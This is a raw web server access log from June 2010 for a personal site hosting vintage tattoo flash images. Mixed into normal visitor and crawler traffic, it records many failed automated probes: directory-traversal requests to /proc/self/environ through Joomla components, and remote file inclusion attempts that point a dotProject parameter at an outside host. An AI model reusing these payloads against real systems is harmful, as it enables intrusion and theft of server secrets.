85.168.82.95 - - [21/Jun/2010:14:21:40 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
85.168.82.95 - - [21/Jun/2010:14:21:40 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
85.168.82.95 - - [21/Jun/2010:14:21:40 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
85.168.82.95 - - [21/Jun/2010:14:21:40 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
85.168.82.95 - - [21/Jun/2010:14:21:40 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
85.168.82.95 - - [21/Jun/2010:14:22:16 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
85.168.82.95 - - [21/Jun/2010:14:22:16 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
85.168.82.95 - - [21/Jun/2010:14:22:17 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
85.168.82.95 - - [21/Jun/2010:14:22:17 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
85.168.82.95 - - [21/Jun/2010:14:22:17 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
85.168.82.95 - - [21/Jun/2010:14:22:17 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
85.168.82.95 - - [21/Jun/2010:14:22:17 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
85.168.82.95 - - [21/Jun/2010:14:22:17 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
85.168.82.95 - - [21/Jun/2010:14:22:17 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
85.168.82.95 - - [21/Jun/2010:14:22:17 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
85.168.82.95 - - [21/Jun/2010:14:22:17 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
85.168.82.95 - - [21/Jun/2010:14:22:39 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
85.168.82.95 - - [21/Jun/2010:14:22:39 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
85.168.82.95 - - [21/Jun/2010:14:22:39 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
85.168.82.95 - - [21/Jun/2010:14:22:39 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
85.168.82.95 - - [21/Jun/2010:14:22:39 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
85.168.82.95 - - [21/Jun/2010:14:22:39 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
85.168.82.95 - - [21/Jun/2010:14:22:39 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
85.168.82.95 - - [21/Jun/2010:14:22:39 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
85.168.82.95 - - [21/Jun/2010:14:22:40 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
85.168.82.95 - - [21/Jun/2010:14:22:40 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
85.168.82.95 - - [21/Jun/2010:14:22:57 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
85.168.82.95 - - [21/Jun/2010:14:22:57 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
85.168.82.95 - - [21/Jun/2010:14:22:57 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
85.168.82.95 - - [21/Jun/2010:14:22:57 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
81.31.149.80 - - [21/Jun/2010:14:25:05 -0500] "GET //dotproject/includes/db_adodb.php?baseDir=http://www.transkonsult.com.ar/test.pdf? HTTP/1.1" 404 317 "-""MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
81.31.149.80 - - [21/Jun/2010:14:25:05 -0500] "GET /logs//dotproject/includes/db_adodb.php?baseDir=http://www.transkonsult.com.ar/test.pdf? HTTP/1.1" 404 322 "-""MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
174.142.61.152 - - [21/Jun/2010:14:31:19 -0500] "GET /logs/access_log.1274572800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.142.61.152 - - [21/Jun/2010:14:31:19 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.142.61.152 - - [21/Jun/2010:14:31:19 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.142.61.152 - - [21/Jun/2010:14:37:31 -0500] "GET /logs/access_log.1274832000/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.142.61.152 - - [21/Jun/2010:14:37:31 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.142.61.152 - - [21/Jun/2010:14:37:31 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.142.61.152 - - [21/Jun/2010:14:38:02 -0500] "GET /logs/access_log.1274572800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.216.99 - - [21/Jun/2010:14:40:08 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
209.200.244.57 - - [21/Jun/2010:14:40:10 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.15.152.183 - - [21/Jun/2010:14:40:48 -0500] "GET /logs/access_log.1274832000/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.65"
67.15.152.183 - - [21/Jun/2010:14:40:48 -0500] "GET /logs/access_log.1274832000/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.65"
67.15.152.183 - - [21/Jun/2010:14:40:48 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
67.15.152.183 - - [21/Jun/2010:14:40:48 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
67.15.152.183 - - [21/Jun/2010:14:40:48 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
67.15.152.183 - - [21/Jun/2010:14:40:49 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
174.121.67.233 - - [21/Jun/2010:14:41:08 -0500] "GET /logs/index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.121.67.233 - - [21/Jun/2010:14:41:09 -0500] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.142.61.152 - - [21/Jun/2010:14:41:09 -0500] "GET /logs/access_log.1274832000/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.142.61.152 - - [21/Jun/2010:14:41:10 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.142.61.152 - - [21/Jun/2010:14:41:10 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
216.104.40.250 - - [21/Jun/2010:14:41:10 -0500] "GET /logs/index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
216.104.40.250 - - [21/Jun/2010:14:41:10 -0500] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
216.104.40.250 - - [21/Jun/2010:14:41:10 -0500] "GET /logs/index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
216.104.40.250 - - [21/Jun/2010:14:41:11 -0500] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
174.121.216.99 - - [21/Jun/2010:14:41:29 -0500] "GET /logs/index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.121.216.99 - - [21/Jun/2010:14:41:29 -0500] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
209.200.244.57 - - [21/Jun/2010:14:41:30 -0500] "GET /logs/index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
209.200.244.57 - - [21/Jun/2010:14:41:30 -0500] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.228.85.91 - - [21/Jun/2010:14:41:57 -0500] "GET /logs/index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.832"
67.228.85.91 - - [21/Jun/2010:14:41:57 -0500] "GET /logs/index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.832"
67.228.85.91 - - [21/Jun/2010:14:41:57 -0500] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
67.228.85.91 - - [21/Jun/2010:14:41:57 -0500] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
209.200.244.57 - - [21/Jun/2010:14:43:10 -0500] "GET /logs/access_log.1274832000/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
209.200.244.57 - - [21/Jun/2010:14:43:10 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
209.200.244.57 - - [21/Jun/2010:14:43:11 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
209.200.244.57 - - [21/Jun/2010:14:43:38 -0500] "GET /logs/access_log.1274832000/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
209.200.244.57 - - [21/Jun/2010:14:43:38 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
209.200.244.57 - - [21/Jun/2010:14:43:38 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
67.228.85.91 - - [21/Jun/2010:14:44:18 -0500] "GET /logs/access_log.1274832000/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.832"
67.228.85.91 - - [21/Jun/2010:14:44:18 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
67.228.85.91 - - [21/Jun/2010:14:44:19 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.832"
174.121.216.99 - - [21/Jun/2010:14:44:21 -0500] "GET /logs/access_log.1274832000/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.216.99 - - [21/Jun/2010:14:44:21 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.216.99 - - [21/Jun/2010:14:44:22 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
67.195.112.180 - - [21/Jun/2010:14:47:46 -0500] "GET /logs/access_log.1211932800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.64.91.113 - - [21/Jun/2010:14:55:12 -0500] "GET /logs/access_log.1274832000/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.828"
69.64.91.113 - - [21/Jun/2010:14:55:13 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.828"
69.64.91.113 - - [21/Jun/2010:14:55:13 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.828"
69.64.91.113 - - [21/Jun/2010:14:56:41 -0500] "GET /logs/access_log.1274572800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.828"
75.127.68.160 - - [21/Jun/2010:15:10:43 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
75.127.68.160 - - [21/Jun/2010:15:10:43 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
75.127.68.160 - - [21/Jun/2010:15:10:46 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
67.195.112.180 - - [21/Jun/2010:15:15:06 -0500] "GET /logs/access_log.1217635200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [21/Jun/2010:15:16:50 -0500] "GET /logs/access_log.1195516800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [21/Jun/2010:15:23:38 -0500] "GET /logs/access_log.1276214400 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.198 - - [21/Jun/2010:15:30:23 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.124.198.60 - - [21/Jun/2010:15:32:50 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
74.124.198.60 - - [21/Jun/2010:15:32:50 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
67.195.112.180 - - [21/Jun/2010:15:40:52 -0500] "GET /logs/access_log.1222905600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.15.152.183 - - [21/Jun/2010:15:41:25 -0500] "GET /logs/access_log.1274572800//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
67.15.152.183 - - [21/Jun/2010:15:41:25 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
67.15.152.183 - - [21/Jun/2010:15:41:25 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
220.181.7.27 - - [21/Jun/2010:15:41:43 -0500] "GET / HTTP/1.1" 200 1003 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
74.124.198.60 - - [21/Jun/2010:15:42:08 -0500] "GET /logs/access_log.1274832000/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.833"
74.124.198.60 - - [21/Jun/2010:15:42:08 -0500] "GET /logs/access_log.1274832000/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.833"
74.124.198.60 - - [21/Jun/2010:15:42:08 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
74.124.198.60 - - [21/Jun/2010:15:42:08 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
74.124.198.60 - - [21/Jun/2010:15:42:08 -0500] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.833"
74.124.198.60 - - [21/Jun/2010:15:42:08 -0500] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.833"
74.124.198.60 - - [21/Jun/2010:15:53:15 -0500] "GET /logs/access_log.1274313600/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.833"
74.124.198.60 - - [21/Jun/2010:15:53:15 -0500] "GET /logs/access_log.1274313600/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.833"
207.46.13.49 - - [21/Jun/2010:16:08:13 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.49 - - [21/Jun/2010:16:09:10 -0500] "GET /logs/access_log.1230768000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.37.19.40 - - [21/Jun/2010:16:12:21 -0500] "GET ///index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
183.180.127.14 - - [21/Jun/2010:16:12:41 -0500] "GET ///index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.808"
174.37.19.40 - - [21/Jun/2010:16:13:31 -0500] "GET /logs/access_log.1274832000///index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
174.37.19.40 - - [21/Jun/2010:16:13:31 -0500] "GET ///index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
174.37.19.40 - - [21/Jun/2010:16:13:31 -0500] "GET /logs///index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
183.180.127.14 - - [21/Jun/2010:16:14:43 -0500] "GET /logs/access_log.1274832000///index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.808"
183.180.127.14 - - [21/Jun/2010:16:14:44 -0500] "GET ///index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.808"
183.180.127.14 - - [21/Jun/2010:16:14:44 -0500] "GET /logs///index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.808"
174.37.19.40 - - [21/Jun/2010:16:18:29 -0500] "GET /logs/access_log.1274832000///index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
174.37.19.40 - - [21/Jun/2010:16:18:29 -0500] "GET ///index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
174.37.19.40 - - [21/Jun/2010:16:18:29 -0500] "GET /logs///index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
188.192.8.74 - - [21/Jun/2010:16:24:08 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
89.201.151.231 - - [21/Jun/2010:16:33:14 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.hr/url?sa=t&source=web&cd=9&ved=0CDcQFjAI&url=http%3A%2F%2Ftomdolan.pconline.com%2Ftattoo%2Ftattoo1.htm&rct=j&q=vintage+tattoo+flash&ei=hdofTLP3DqSUOOTjnLsM&usg=AFQjCNHjrXnOYOTb8B7m3-3jlFkAbM0Ulw""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
89.201.151.231 - - [21/Jun/2010:16:33:15 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NE